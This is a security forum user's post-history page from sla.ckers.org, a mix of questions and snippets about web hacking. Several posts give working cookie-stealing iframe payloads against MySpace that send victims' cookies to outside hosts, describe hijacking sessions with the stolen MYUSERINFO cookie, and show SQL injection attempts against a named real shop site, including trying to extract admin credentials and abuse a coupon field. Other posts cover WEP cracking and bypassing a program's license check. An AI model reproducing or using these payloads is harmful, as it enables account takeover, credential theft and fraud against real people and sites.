Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
For 802.11 and bluetooth security people alike. Latest trends, attack surface issues, and prevention. How wireless security is becoming the new vector to hacking corporate websites and applications. 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 31
2 years ago
Royal2000H
I've been getting some failed mail delivery reports at my catch-all email address on my server. Finding this weird, I had a feeling there was spam coming out of it. Connecting through FTP, I found some definitely odd files. 1. A file violin.php which let the spammers send mail out of my server and domain through POST parameters. 2. Three obscure, randomly named html files which were empty
Forum: SPAM
5 years ago
Royal2000H
wireghoul... that's what I was saying My post said that it DOESNT do that - which is why hosts is NOT a solution. Of course it doesn't magicall alter the url. That's why I was looking for a solution that will alter the url (or at least the response... Unfortunately, I only know web programming (PHP, javascript, etc) so I won't be able to write something to handle this without running a b
Forum: OMG Ponies
5 years ago
Royal2000H
thrill, I think you mean: ip.address.to.mysite www.site1.com The problem is mysite is on a shared server. so the ip address wont serve files. instead its: ip.address.to.mysite/~mysite/ = mysite.com So if I try doing that still: site1.com/authenticate.php will go to ip.address.to.mysite/authenticate.php (nonexistent) instead of ip.address.to.mysite/~mysite/authenticate.php (which is also
Forum: OMG Ponies
5 years ago
Royal2000H
Basically, I'm trying to reverse engineer a program. When you open the program, it consults the site. for example: http://www.site1.com/authenticate.php which outputs true or false If it gets false - program closes. If it gets true - access granted. Up until now, I've been using burp to do this (which greatly slows everything down) So I want to do something like this. When the program
Forum: OMG Ponies
7 years ago
Royal2000H
I'm currently entertaining myself with cracking WEP. WPA is too much right now. Anyway my desktop is (or was actually) running linux with the ever so popular ubuntu. Anyway for certain reasons I can't put linux on my laptop. So from what I understand there are no tools at this time for wep cracking on windows. That leads me to linux live cd. In your experiences what's the best live
Forum: Wireless Security
7 years ago
Royal2000H
rohanpinto Wrote: ------------------------------------------------------- > @Royal200H > > yep fixed.. and probably banned too :-) > > questions for you... R u here to discover > vulnerabilities and exploit them ? or learn ? Answer for you. Learn :P A comment about a vulnerability isn't as good as first hand. It was reported anyway and I have my own .com domain n
Forum: Full Disclosure
7 years ago
Royal2000H
From http://sla.ckers.org/forum/read.php?11,11937 Royal2000H Wrote: ------------------------------------------------------- > In my current pentest, I need to change the > payload of a packet.... which is possible in > Burp.... but if I want automated regex change it > only works with headers.... > > Is there any way to deal with the payload in Burp You did respond in
Forum: Projects
7 years ago
Royal2000H
didn't work for me... probably fixed
Forum: Full Disclosure
7 years ago
Royal2000H
the ones that are still visible to the human eye but aren't visible when the camera takes it (or so they claim the camera doesn't see it- i have no first hand experience with this) are in fact legal at this point in time. in the future they may be illegal but there is nothing in the current law that makes them illegal in the US or at least in California
Forum: OMG Ponies
7 years ago
Royal2000H
Java is one of the three languages on my list to learn... along with C and C++ if anyone (I guess tx) writes code for the iburpextender, please let me know... otherwise ill keep my eye out for a new version ;) thanks rsnake, portswigger and tx for replying :] Burp is a great tool
Forum: OMG Ponies
7 years ago
Royal2000H
anyone, this comes very useful
Forum: OMG Ponies
7 years ago
Royal2000H
http://www.rot13.com/?text=</GrKgNerN><fpevcg ynathntr="wninfpevcg">nyreg('KFF ol Eblny2000U');</fpevcg> </GrKgNerN><fpevcg ynathntr="wninfpevcg">nyreg('KFF ol Eblny2000U');</fpevcg> = the rot13 of </TeXtAreA><script language="javascript">alert('XSS by Royal2000H');</script> :)
Forum: Full Disclosure
7 years ago
Royal2000H
try this in your html file (instead of your current iframe) that's how mine is and it works fine.... <iframe src="http://home.myspace.com./" onload="stolenc = escape(frames[0].document.cookie); document.location='http://radpimps.com/cookie.php?cookie='+(stolenc)"></iframe> also, make sure you have a cookielog.txt sounds simple enough, but sometimes forgotte
Forum: Full Disclosure
7 years ago
Royal2000H
is great.... In my current pentest, I need to change the payload of a packet.... which is possible in Burp.... but if Iwant automated regex change it only works with headers.... Is there any way to deal with the payload in Burp (using some extension) or with another program- that doesnt leave traces like paros? Thanks everyone :)
Forum: OMG Ponies
7 years ago
Royal2000H
I'm looking for a tool similar to Burp Repeater (Repeater not proxy) or an extension to it that would allow me to automate the packet sending Currently in Burp Proxy, I fill in the host and port and packet which starts with "GET /example.php?Id=100 HTTP/1.1" and has alot more (like user agent etc) then I click go and then the only thing i change is 100 to 101 in the GET then click go
Forum: OMG Ponies
7 years ago
Royal2000H
By the error, it seems they are using etomite, which is and open source CMS which can be downloaded here: http://www.etomite.org/downloads.html the site with the vuln probably has a version number, so you can download that version of etomite and look at source to see how exactly everything is working
Forum: SQL and Code Injection
7 years ago
Royal2000H
My SQL injection is giving me info... but not really working There is a checkout and and option to put in a coupon code... I was trying to find a really good coupon code I also noticed that without a coupon, it gives me $0.04 off in the confirmation page Coupon Code: -- (on the left) (and on the right) Less Discount: -$0.04 OK so I went back to the edit cart to put in the promo code an
Forum: SQL and Code Injection
7 years ago
Royal2000H
142TeeTH Wrote: ------------------------------------------------------- > @Royal2000H, > hm, could of sworn i typed it correctly. > however, it seems to work perfect with me. > > and yea, MYUSERINFO logs you in. > shame IE doesn't store it the way that's > productive to, persay, us. ^_^ use the cookie to it's fullest I realized after a few days it won't work a
Forum: Full Disclosure
7 years ago
Royal2000H
Spikeman Wrote: ------------------------------------------------------- > There's no way to log in as a user by stealing > their cookie unless you can spoof your IP and your > user agent to be the same as theirs. 1. spoofing user agent is easy 2. you don't need to spoof user agent or IP I successfully stole people's cookies, applied only the MYUSERINFO cookie, and was able to
Forum: Full Disclosure
7 years ago
Royal2000H
he saw the word injection and came to a quick conclusion you might want to read it more in depth to understand xss
Forum: SQL and Code Injection
7 years ago
Royal2000H
hackathology uses sqlninja maybe you want to contact him?
Forum: SQL and Code Injection
7 years ago
Royal2000H
I cant get it to work no matter what I do... http://www.excelhomevideos.com/showproduct.php3?product_id=1204 I got this far http://www.excelhomevideos.com/showproduct.php3?product_id=1204%39%20UNION%20SELECT%20*%20FROM%20users%20WHERE%20username%20=%39admin%39-- but excel.users doesnt exist so i try http://www.excelhomevideos.com/showproduct.php3?product_id=1204%39%20UNION%20SELECT%
Forum: SQL and Code Injection
7 years ago
Royal2000H
i would assume she checks to make sure your name matches your address
Forum: News and Links
7 years ago
Royal2000H
I'm sorry Noobly/noobishly, I don't understand what you're saying
Forum: SQL and Code Injection
7 years ago
Royal2000H
It feels like it is... but then again.... i keep getting errors with no actions site.com/abc.php3?product_id=1204' UNION SELECT username,password FROM users WHERE username ='admin'/* it still shows the product information as it would at site.com/abc.php3?product_id=1204 but i also get the following error just under the product descripton: Database error: Invalid SQL: SELECT * FROM BuyL
Forum: SQL and Code Injection
7 years ago
Royal2000H
apparently the only cookie needed to login is called "MYUSERINFO" the other ones are not necessary for logging in
Forum: Full Disclosure
7 years ago
Royal2000H
digitalIllusionism Wrote: ------------------------------------------------------- > > Escape the cookie first or each ampersands in the > cookie will just get read as denoting a new > variable. > c = escape(document.cookie); > That has never ceased to work for me. > > Thanks, that works, here's the updated version <script type="text/javascript&
Forum: Full Disclosure
7 years ago
Royal2000H
trev can you or someone show an example of how to change the person's display name or add something to their profile or anything else? ps, stealing the cookie with what I posted above won't work because the cookie gets cut off
Forum: Full Disclosure
7 years ago
Royal2000H
actually 142teeth your code breaks due to the " so this would be the code: <script type="text/javascript"> document.domain = "com."; </script> <iframe src="http://home.myspace.com./" onload="document.location='http://site.com?c='+(frames[0].document.cookie)"></iframe>
Forum: Full Disclosure
Pages: 12Next
Current Page: 1 of 2